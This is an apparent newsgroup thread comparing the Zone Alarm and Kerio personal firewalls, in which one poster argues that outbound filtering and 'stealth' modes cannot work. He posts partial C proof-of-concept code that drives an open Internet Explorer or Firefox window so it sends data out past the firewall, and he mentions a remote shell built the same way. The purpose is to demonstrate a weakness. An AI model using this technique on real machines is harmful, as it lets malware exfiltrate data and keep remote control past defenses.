Zone Alarm vs Kerio

It obviously depends on what your needs are and what you want...

Obviously. I'm not a really advanced user so can you be more specific about what I should detail about my needs?

Just use the Windows-Firewall.

Yours, VB.

I'm afraid that won't do, I need a firewall to control outbound connections.

Unfortunately, it's not possible to control outbound traffic reliable, because of tunneling.

A simple test proofes this:

start an Internet Explorer, and test it for your own, your "Personal Firewall" activated.

In our tests every of the tested "Personal Firewalls" failed to detect even such simple tunneling methods. Alexander Bernauer then wrote a simple remote shell with this POC, the wwwsh. And no "Personal Firewall" was able to detain this remote control software, as expected (you can download the code here:

Even, if the "Personal Firewall" providers will extend their efforts, and will try to prevent this in future releases, there are so many possibilities to tunnel, that this attempt cannot not succeed.

So it's true unfortunately, that the only type of application the "Personal Firewalls" are able to stop communicating, are the programs, which admit to be controlled.

Yes, some more harmless malware is like this, but I doubt, that this is what you intend to stop communicating.

The only way to avoid unwanted software on your PC is not installing and executing it. If it's running, mostly it's too late.

Yours, VB.

Does this apply to other browsers also, or is it just IE..

This works with any browser.

Yours, VB.

What's supposed to happen when I go to this URL ???

You'll see C source code for a POC, how to communicate outside in spite of any "Personal Firewall". This POC requires, that the browser is already running.

If you believe, that this is a problem, I will post a POC, how to start the browser without having problems with a "Personal Firewall", too.

First the Internet Explorer version:

--------------------------- snip ------------------------------------------ #include

int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL); HWND wrk, tb, cbx, cb, url;

if (ie == NULL) { MessageBox(NULL, "Please open an Internet Explorer window, or" "I will goin' to open one myself ;-)", "Oooh!", MB_OK | MB_ICONEXCLAMATION);

return 0; }

wrk = FindWindowEx(ie, NULL, "WorkerW", NULL); tb = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL); cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL); cb = FindWindowEx(cbx, NULL, "ComboBox", NULL); url = FindWindowEx(cb, NULL, "Edit", NULL);

SendMessage(url, WM_SETTEXT, NULL, "

"); PostMessage(url, WM_SETFOCUS, 0, 0); PostMessage(url, WM_KEYDOWN, VK_RETURN, 0); return 0; }

--------------------------- snap ------------------------------------------

and here the Mozilla Firefox version:

--------------------------- snip ------------------------------------------ #include

const char *phoneHome = "

"; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL); HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL); int i;

SetForegroundWindow(wnd);

PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);

for (i=0; i

Ok, thanks, that's what I wanted to know.

Why do you want to do this? The IP stack of Windows has no bugs with ICMP echo any more, so it's useless to stop it.

Yours, VB.

BTW: you could also cancel your article. Just read the documentation of your newsreader.

F'up2P, VB.

Easy tiger, I'm just a novice and you lost me there! I just like to be stealthed.

Oh, and I cancelled those other messages - I'd no idea that could be done, so cheers!

This is impossible.

The "stealth"-features of the "Personal Firewalls" all are based on misunderstanding ICMP.

It is not possible to make a PC "invisible" in the Internet by a Software running on this PC if it's connected, because an host seems to be not there only, if a router before the host sends ICMP Destination Unreachable with code 0 (net unreachable) or code 1 (host unreachable), see RFC 791 / STD 0005,

Therefore i.e. portscanners have no problem to detect a PC, which is "stealthed" by any "Personal Firewall".

For example, with nmap use the parameter -P0 to detect PCs, which are "stealthed".

I don't know, if the providers of the "Personal Firewalls" don't understand the Internet Protocol family, or if they're lying to sell their products with non-existing "stealth"-features.

Yours, VB.

Jeus, forget I said anything.

Sorry, I didn't want to scare away you ;-)

I just wanted to explain, why the advertisment of the "Personal Firewall" providers is rank nonsense. What they're claiming, their products should accomplish, just is impossible.

There is a gap between reality and advertisment here - and not only here, I'm sorry.

Yours, VB.

You're not one of those people who thinks using AV software is a bad idea are you?

No, I'm not. Anti-Virus tools can be utilized sensible, if one knows the constraints they're subjecting.

Why?

Yours, VB.

Firewalls are one thing, but people who think than AVs are worthless are idiots.